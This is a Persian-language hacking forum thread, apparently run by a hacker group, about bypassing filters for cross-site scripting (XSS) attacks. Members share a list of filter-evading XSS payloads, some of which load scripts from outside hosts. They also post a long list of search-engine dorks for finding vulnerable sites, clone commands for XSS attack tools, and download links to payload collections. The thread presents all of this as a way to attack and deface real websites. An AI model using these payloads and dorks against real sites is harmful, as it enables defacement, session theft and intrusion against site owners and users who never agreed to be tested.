زمان جاری : شنبه 04 بهمن 1399 - 1:53 قبل از ظهر
نام کاربری : پسورد : یا عضویت | رمز عبور را فراموش کردم






ارسال پاسخ
تعداد بازدید 2878
نویسنده پیام
eblisshar آفلاین


ارسال‌ها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
انواع بایپس های باگ XSS
درود . در این تایپک انواع بای پس های باگ خطرناک xss رو میزاریم
این باگ در 80% سایت ها وجود داره و فقط باید بایپس بشه
xss انواع مختلقی داره و بهترین روش اینجکت کد های جاوا اسکریپت با متود get هست که در قسمت سرچ و یا هر قسمتی که با متود get ارسال بشه میشه استفاده کرد
و البته فرقی هم نداره و میشه با متود post تست کرد مثل فروم ها و فیلدهای ثبت نام و غیره . برای پیدا کردن سایت های که این باگ رو دارن دورک های زیادی نوشته شده که داخل همین انجمن میتونید پیدا کنید.
باگ xss قدرت بسیار بالای داره و یکی از خظرناک ترین و رایج ترین باگ ها هست شما میتونید کار های بسیار زیادی با استفاده از این باگ کنید و حتی سایت رو دیفیس کنید
در اینجا سعی میکنیم تمام اسکریپهای بایپس این باگ رو قرار بدیم
به علت قدرت بالای این باگ و اینکه گزاشتن مستقیم کد ها در انجمن باعث اجرای کد میشه اسکریپ ها در فایل تکست گزاشته میشه

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8

دست بالای دست بسیار است، اما قدرت در دستان ماست.
سه شنبه 24 مهر 1397 - 03:16
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
[RB:Blog_Keywords_Tags] اشرارتیم
تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran & virus32 & amirshar & demon & e-deh & mrfucker & gandi & nolan & sativa & sharboy & mrattacker & reza_d &
eblisshar آفلاین



ارسال‌ها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
پاسخ : 2 RE انواع بایپس های باگ XSS
دانلود :

xsscheatsheet

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8

دست بالای دست بسیار است، اما قدرت در دستان ماست.
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 13 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / mrrobot / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
پاسخ : 3 RE انواع بایپس های باگ XSS
دانلود : xss code

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8

دست بالای دست بسیار است، اما قدرت در دستان ماست.
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 13 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / mrrobot / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
پاسخ : 4 RE انواع بایپس های باگ XSS
دانلود :
xss script

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8

دست بالای دست بسیار است، اما قدرت در دستان ماست.
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
پاسخ : 5 RE انواع بایپس های باگ XSS
دانلود :

XSS.script

امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8

دست بالای دست بسیار است، اما قدرت در دستان ماست.
سه شنبه 24 مهر 1397 - 03:23
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
پاسخ : 6 RE انواع بایپس های باگ XSS
و این هم کامل ترین و بزرگترین لیست از بایپس های این باگ که شخصا جمع اوری کردم و نوشتم



امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8

دست بالای دست بسیار است، اما قدرت در دستان ماست.
سه شنبه 24 مهر 1397 - 03:25
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
پاسخ : 7 RE انواع بایپس های باگ XSS


کد:

Full URI uriInHTMLData() uriInHTMLComment() uriInSingleQuotedAttr() uriInDoubleQuotedAttr() uriInUnQuotedAttr()
URI Path uriPathInHTMLData() uriPathInHTMLComment() uriPathInSingleQuotedAttr() uriPathInDoubleQuotedAttr() uriPathInUnQuotedAttr()
URI Query uriQueryInHTMLData() uriQueryInHTMLComment() uriQueryInSingleQuotedAttr() uriQueryInDoubleQuotedAttr() uriQueryInUnQuotedAttr()
URI Component uriComponentInHTMLData() uriComponentInHTMLComment() uriComponentInSingleQuotedAttr() uriComponentInDoubleQuotedAttr() uriComponentInUnQuotedAttr()
URI Fragment uriFragmentInHTMLData() uriFragmentInHTMLComment() uriFragmentInSingleQuotedAttr() uriFragmentInDoubleQuotedAttr() uriFragmentInUnQuotedAttr()


امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8

دست بالای دست بسیار است، اما قدرت در دستان ماست.
سه شنبه 24 مهر 1397 - 05:01
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
eblisshar آفلاین



ارسال‌ها : 431
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 440
تشکر شده : 2013
پاسخ : 8 RE انواع بایپس های باگ XSS
یک ابزار عالی پایتون برای تست نفوذ سایت با باگ xss

git clone https://github.com/DanMcInerney/xsscrapy.git

cd xsscrapy

./xsscrapy.py -u http://example.com


امضای کاربر : در حکم یک نعره لب دوختن ..

وبسایت سازمان اشرار : AshRaR.Info

چنل جدید : Hacktivi3t
چنل قدیم : AshRaROffical
پیوی : ebli3shar
توییتر : ShayanAkbari8

دست بالای دست بسیار است، اما قدرت در دستان ماست.
سه شنبه 24 مهر 1397 - 05:04
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
blackwolf_iran آفلاین



ارسال‌ها : 52
عضویت: 19 /7 /1397
تشکرها : 316
تشکر شده : 271
پاسخ : 9 RE انواع بایپس های باگ XSS
بسیار عالی و کاربردی

این هم یک لیست خوب از پیلود های این باگ



امضای کاربر :
باید ادامه داد مثل چریک پیر
شاهین نجفی
سه شنبه 24 مهر 1397 - 05:10
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از blackwolf_iran به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
blackwolf_iran آفلاین



ارسال‌ها : 52
عضویت: 19 /7 /1397
تشکرها : 316
تشکر شده : 271
پاسخ : 10 RE انواع بایپس های باگ XSS
بایپس های دیگر

کد:

<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confiru006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((prou006dpt))()//
<sCript x>;(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src //onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>


امضای کاربر :
باید ادامه داد مثل چریک پیر
شاهین نجفی
سه شنبه 24 مهر 1397 - 05:11
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از blackwolf_iran به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
darkshadow آفلاین



ارسال‌ها : 173
عضویت: 8 /6 /1397
محل زندگی: California LA
تشکرها : 400
تشکر شده : 644
پاسخ : 11 RE دورک xss
و این هم دروکهای خوب xss برای پیدا کردن سایت

کد:

inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/search_results.php?search=Search&k=
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/notice.php?msg= /notice.php?msg=
inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
inurl:/index.php?option=com_easygb&Itemid=
inurl:/2wayvideochat/index.php?r=
inurl:/view.php?PID= /view.php?PID=
inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
inurl:/showproperty.php?id= /showproperty.php?id=
inurl:/vehicle/buy_do_search/?order_direction=
inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
inurl:/winners.php?year=2008&type= /winners.php?
inurl:/schoolmv2/html/studentmain.php?*******=
inurl:/site_search.php?sfunction= /site_search.php?sfunction=
inurl:/search.php?search_keywords= /search.php?search_keywords=
inurl:/hexjector.php?site= /hexjector.php?site=
inurl:/news.php?id= /news.php?id=
inurl:/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:/index.php?
inurl:/info.asp?
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=

inurl:/pages/match_report.php?mid= pages/match_report.php?mid=


امضای کاربر :
کتگوری های انجمن

اخرین تاپیک های انجمن

کتگوری هکینگ


دوست داشتنی ترین چیزها اگر تو را ضعیف کنند، خطرناک ترین چیزهایند.
شاهین نجفی
سه شنبه 24 مهر 1397 - 08:11
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 12 کاربر از darkshadow به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker / gandi / nolan / sativa / sharboy / mrattacker / reza_d /
virus32 آفلاین



ارسال‌ها : 44
عضویت: 26 /6 /1397
تشکرها : 222
تشکر شده : 241
پاسخ : 12 RE انواع بایپس های باگ XSS
سایت کاربردی جهت تست نفوذ باگ xss و دانلود ابزارها و ...


یکشنبه 06 آبان 1397 - 05:00
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 9 کاربر از virus32 به خاطر این مطلب مفید تشکر کرده اند: amirshar / demon / e-deh / mrfucker / gandi / sativa / sharboy / mrattacker / reza_d /
virus32 آفلاین



ارسال‌ها : 44
عضویت: 26 /6 /1397
تشکرها : 222
تشکر شده : 241
پاسخ : 13 RE انواع بایپس های باگ XSS
یک لیست از متود های جدید و حرفه ای برای بایپس باگ xss

دانلود :



یکشنبه 06 آبان 1397 - 05:37
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 10 کاربر از virus32 به خاطر این مطلب مفید تشکر کرده اند: eblisshar / amirshar / demon / e-deh / mrfucker / gandi / sativa / sharboy / mrattacker / reza_d /
demon آفلاین



ارسال‌ها : 84
عضویت: 17 /2 /1397
سن: 22
تشکرها : 386
تشکر شده : 361
پاسخ : 14 RE انواع بایپس های باگ XSS
مقاله مفید و یک ابزار برای اموزش XSS (Cross Site Scripting)


امضای کاربر : اشرار پایدار

Ali Mrd

Twitter : twitter.com/Mokh4lef

AshRaR.Info

shahinnajafi.ashrar.info
پنجشنبه 01 آذر 1397 - 20:10
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 8 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: e-deh / mrfucker / gandi / virus32 / sativa / sharboy / mrattacker / reza_d /
demon آفلاین



ارسال‌ها : 84
عضویت: 17 /2 /1397
سن: 22
تشکرها : 386
تشکر شده : 361
پاسخ : 15 RE باگ xss

  • سایت xss scanner برای تست انلاین باگ xss





امضای کاربر : اشرار پایدار

Ali Mrd

Twitter : twitter.com/Mokh4lef

AshRaR.Info

shahinnajafi.ashrar.info
دوشنبه 22 مهر 1398 - 02:52
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 5 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: virus32 / sativa / sharboy / mrattacker / reza_d /
demon آفلاین



ارسال‌ها : 84
عضویت: 17 /2 /1397
سن: 22
تشکرها : 386
تشکر شده : 361
پاسخ : 16 RE هک سایت باگ xss
ابزار
XSStrike
انواع حملات باگ xss

  • Suggest a feature

  • Report a bug

  • Fix something and open a pull request

  • Create a browser extension

  • Create a burp suite/zaproxy plugin

  • Help me document the code

  • Spread the word






  • git clone https://github.com/s0md3v/XSStrike.git




    امضای کاربر : اشرار پایدار

    Ali Mrd

    Twitter : twitter.com/Mokh4lef

    AshRaR.Info

    shahinnajafi.ashrar.info
    دوشنبه 22 مهر 1398 - 02:56
    نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
     تشکر شده: 5 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: virus32 / sativa / sharboy / mrattacker / reza_d /
    eblisshar آفلاین



    ارسال‌ها : 431
    عضویت: 12 /12 /1396
    شناسه یاهو: eblisshar@yahoo.com
    تشکرها : 440
    تشکر شده : 2013
    پاسخ : 18 RE اموزش کامل باگ xss
    13 فایل حاوی پیلود و بای پس های جدید و قوی باگ


    دانلود :
    https://drive.google.com/drive/folders/1e8h13qHnlEsj-8iutyRoOvqHSR46wFLz?usp=sharing

    امضای کاربر : در حکم یک نعره لب دوختن ..

    وبسایت سازمان اشرار : AshRaR.Info

    چنل جدید : Hacktivi3t
    چنل قدیم : AshRaROffical
    پیوی : ebli3shar
    توییتر : ShayanAkbari8

    دست بالای دست بسیار است، اما قدرت در دستان ماست.
    سه شنبه 22 مهر 1399 - 01:10
    نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
    ارسال پاسخ



    برای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.


    پرش به انجمن :


    تماس با ما | انواع بایپس های باگ XSS | بازگشت به بالا | پیوند سایتی RSS
    تاپیک های مرتبط
    موضوع تاریخ تعداد پاسخ آخرین ارسال بازدید
    دانلود RapidScan اسکنر اسیب پذیری های وب ... جمعه 12 دی 1399 - 19:12 1 eblisshar 70
    اگر درسایت شل اپلوذ کردید بانتی دریافت کنید / بایپ ... جمعه 12 دی 1399 - 7:56 1 eblisshar 120
    دانلود فریم‌ورک Maryam جمعه 12 دی 1399 - 3:16 1 eblisshar 98
    مرجع کامل وایرلس هکینگ در اینترنت ... جمعه 12 دی 1399 - 1:08 72 armanshr 7586
    Shirbit اسرائیل هک شد - دانلود دیتا ... پنجشنبه 13 آذر 1399 - 6:28 0 eblisshar 121
    دانلود بایپس های SQL و پیلود های مهم هک دیتابیس ... چهارشنبه 05 آذر 1399 - 0:40 0 demon 159
    دانلود مسیرهای باگ و فایلهای سرور در سایتها ... چهارشنبه 05 آذر 1399 - 0:35 0 demon 126
    دانلود ابرازهای بایپس سرور و اپلود شل ... چهارشنبه 05 آذر 1399 - 0:29 0 demon 134
    دانلود بات های Auto Exploiter پنجشنبه 22 آبان 1399 - 12:18 0 eblisshar 172
    برترین سایت های هک و امنیت در جهان ... یکشنبه 27 مهر 1399 - 10:45 48 nima_shar 5380
    انواع بایپس های باگ XSS سه شنبه 22 مهر 1399 - 1:10 16 eblisshar 2878
    اطلاعات هک شده از آژانس امنیت ملی امریکا (NSA) ... دوشنبه 27 مرداد 1399 - 19:32 0 eblisshar 610
    ابزار انلاین برای هک و کرک و... ... یکشنبه 15 تیر 1399 - 23:38 1 1234 872
    اتحاد اشرار و هکران اندونزی پنجشنبه 25 اردیبهشت 1399 - 21:51 0 eblisshar 906
    سایتهای بریتانیا با اسیب پذیری SQLi ... جمعه 05 اردیبهشت 1399 - 11:59 1 arch 1015
    telegram 40m db جمعه 15 فروردین 1399 - 22:24 0 eblisshar 1023
    موشکافی وب هکینگ مهمترین آسیب پذیري هاي برنامه هاي ... جمعه 08 فروردین 1399 - 22:28 14 arash-shar 1892
    معرفی تمام ابزارهای هک SQL Injection ... شنبه 17 اسفند 1398 - 8:37 2 darkshadow 1012
    ابزار SiteBroker جمع اوری اطلاعات ... یکشنبه 26 اسفند 1397 - 15:50 2 mamba 1017
    tamper های تمام دیتابیس های در sqlmap ... یکشنبه 26 اسفند 1397 - 12:40 2 mamba 873